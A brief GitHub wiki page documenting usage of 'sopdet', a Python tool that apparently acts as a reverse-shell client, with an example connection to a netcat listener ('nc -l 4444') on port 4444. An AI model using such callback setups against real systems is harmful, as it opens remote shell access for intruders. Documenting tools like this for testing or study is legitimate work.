Skip to content

Commands & Examples

apacketofsweets edited this page Apr 1, 2023 · 3 revisions

Accepted syntax:

python sopdet.py <IP address> <port>

Example:

Client-side

$ python sopdet.py 192.168.0.2 4444 linux

[*] Sopdet client connected to 192.168.0.2

Server-side

$ nc -l 4444

Connection from 192.168.0.3 65095 received!

Clone this wiki locally